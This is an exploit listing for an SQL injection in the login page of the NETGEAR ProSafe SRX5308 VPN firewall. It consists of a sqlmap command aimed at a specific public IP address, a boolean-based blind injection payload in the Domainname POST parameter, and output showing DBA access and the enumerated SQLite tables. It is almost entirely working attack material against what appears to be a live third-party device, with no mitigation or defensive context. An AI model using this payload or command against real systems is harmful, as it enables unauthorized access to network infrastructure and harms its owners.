# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://95.128.69.5/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[+] SQLite_masterdb
Database: SQLite_masterdb
[4 tables]
+----------+
| system   |
| logging  |
| services |
| zones    |
+----------+